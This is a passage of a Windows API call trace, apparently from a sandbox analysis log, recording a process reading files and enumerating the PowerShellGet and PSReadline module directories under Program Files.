[0152.000] ReadFile (in: hFile=0x59c, lpBuffer=0x238003d2498, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508e178, lpOverlapped=0x0 | out: lpBuffer=0x238003d2498*, lpNumberOfBytesRead=0xafa508e178*=0x1000, lpOverlapped=0x0) returned 1 [0152.001] ReadFile (in: hFile=0x59c, lpBuffer=0x238003d2498, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508e178, lpOverlapped=0x0 | out: lpBuffer=0x238003d2498*, lpNumberOfBytesRead=0xafa508e178*=0xac4, lpOverlapped=0x0) returned 1 [0152.001] ReadFile (in: hFile=0x59c, lpBuffer=0x238003d1a9c, nNumberOfBytesToRead=0x13c, lpNumberOfBytesRead=0xafa508e178, lpOverlapped=0x0 | out: lpBuffer=0x238003d1a9c*, lpNumberOfBytesRead=0xafa508e178*=0x0, lpOverlapped=0x0) returned 1 [0152.001] ReadFile (in: hFile=0x59c, lpBuffer=0x238003d2498, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508e178, lpOverlapped=0x0 | out: lpBuffer=0x238003d2498*, lpNumberOfBytesRead=0xafa508e178*=0x0, lpOverlapped=0x0) returned 1 [0152.001] CloseHandle (hObject=0x59c) returned 1 [0152.003] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0152.004] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psm1")) returned 0xffffffff [0152.004] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.cdxml")) returned 0xffffffff [0152.004] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.xaml")) returned 0xffffffff [0152.004] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.dll")) returned 0xffffffff [0152.004] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.004] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x105, lpBuffer=0xafa508dd60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0152.004] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\*"), lpFindFileData=0xafa508df90 | out: lpFindFileData=0xafa508df90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b4710 [0152.005] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0152.005] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 1 [0152.005] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0152.005] FindClose (in: hFindFile=0x2386d3b4710 | out: hFindFile=0x2386d3b4710) returned 1 [0152.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.005] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.005] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x105, lpBuffer=0xafa508dd60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0152.005] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\*"), lpFindFileData=0xafa508df90 | out: lpFindFileData=0xafa508df90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b4b90 [0152.006] FindNextFileW (in: hFindFile=0x2386d3b4b90, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0152.006] FindNextFileW (in: hFindFile=0x2386d3b4b90, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 1 [0152.006] FindNextFileW (in: hFindFile=0x2386d3b4b90, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 0 [0152.006] FindClose (in: hFindFile=0x2386d3b4b90 | out: hFindFile=0x2386d3b4b90) returned 1 [0152.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.006] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e0f0) returned 1 [0152.006] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", nBufferLength=0x105, lpBuffer=0xafa508dbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", lpFilePart=0x0) returned 0x39 [0152.007] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\*"), lpFindFileData=0xafa508de00 | out: lpFindFileData=0xafa508de00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b4dd0 [0152.007] FindNextFileW (in: hFindFile=0x2386d3b4dd0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0152.007] FindNextFileW (in: hFindFile=0x2386d3b4dd0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0152.007] FindNextFileW (in: hFindFile=0x2386d3b4dd0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0152.007] FindNextFileW (in: hFindFile=0x2386d3b4dd0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psd1", cAlternateFileName="PSREAD~1.PSD")) returned 1 [0152.008] FindNextFileW (in: hFindFile=0x2386d3b4dd0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 1 [0152.008] FindNextFileW (in: hFindFile=0x2386d3b4dd0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 0 [0152.008] FindClose (in: hFindFile=0x2386d3b4dd0 | out: hFindFile=0x2386d3b4dd0) returned 1 [0152.008] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e020) returned 1 [0152.008] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfe0) returned 1 [0152.008] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e0f0) returned 1 [0152.008] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", nBufferLength=0x105, lpBuffer=0xafa508dbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", lpFilePart=0x0) returned 0x39 [0152.008] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\*"), lpFindFileData=0xafa508de00 | out: lpFindFileData=0xafa508de00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b4a10 [0152.009] FindNextFileW (in: hFindFile=0x2386d3b4a10, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0152.009] FindNextFileW (in: hFindFile=0x2386d3b4a10, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0152.009] FindNextFileW (in: hFindFile=0x2386d3b4a10, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0152.009] FindNextFileW (in: hFindFile=0x2386d3b4a10, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psd1", cAlternateFileName="PSREAD~1.PSD")) returned 1 [0152.009] FindNextFileW (in: hFindFile=0x2386d3b4a10, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 1 [0152.009] FindNextFileW (in: hFindFile=0x2386d3b4a10, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0152.010] FindClose (in: hFindFile=0x2386d3b4a10 | out: hFindFile=0x2386d3b4a10) returned 1 [0152.010] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e020) returned 1 [0152.010] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfe0) returned 1 [0152.010] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df60) returned 1 [0152.010] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", nBufferLength=0x105, lpBuffer=0xafa508da40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", lpFilePart=0x0) returned 0x3c [0152.010] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\*"), lpFindFileData=0xafa508dc70 | out: lpFindFileData=0xafa508dc70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b4710 [0152.010] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508dc30 | out: lpFindFileData=0xafa508dc30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0152.010] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508dc30 | out: lpFindFileData=0xafa508dc30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0152.011] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508dc30 | out: lpFindFileData=0xafa508dc30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0152.011] FindClose (in: hFindFile=0x2386d3b4710 | out: hFindFile=0x2386d3b4710) returned 1 [0152.011] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de90) returned 1 [0152.011] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0152.011] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df60) returned 1 [0152.011] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", nBufferLength=0x105, lpBuffer=0xafa508da40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", lpFilePart=0x0) returned 0x3c [0152.011] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\*"), lpFindFileData=0xafa508dc70 | out: lpFindFileData=0xafa508dc70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b4cb0 [0152.011] FindNextFileW (in: hFindFile=0x2386d3b4cb0, lpFindFileData=0xafa508dc30 | out: lpFindFileData=0xafa508dc30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0152.011] FindNextFileW (in: hFindFile=0x2386d3b4cb0, lpFindFileData=0xafa508dc30 | out: lpFindFileData=0xafa508dc30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0152.011] FindNextFileW (in: hFindFile=0x2386d3b4cb0, lpFindFileData=0xafa508dc30 | out: lpFindFileData=0xafa508dc30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0152.011] FindClose (in: hFindFile=0x2386d3b4cb0 | out: hFindFile=0x2386d3b4cb0) returned 1 [0152.012] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de90) returned 1 [0152.012] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0152.012] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", nBufferLength=0x105, lpBuffer=0xafa508db20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", lpFilePart=0x0) returned 0x3c [0152.012] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df70) returned 1 [0152.012] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en"), fInfoLevelId=0x0, lpFileInformation=0xafa508e050 | out: lpFileInformation=0xafa508e050*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0152.012] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508df30) returned 1 [0152.012] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508dfc0) returned 1 [0152.012] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", nBufferLength=0x105, lpBuffer=0xafa508daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", lpFilePart=0x0) returned 0x3c [0152.012] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\*"), lpFindFileData=0xafa508dcd0 | out: lpFindFileData=0xafa508dcd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b55b0 [0152.012] FindNextFileW (in: hFindFile=0x2386d3b55b0, lpFindFileData=0xafa508dc90 | out: lpFindFileData=0xafa508dc90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, 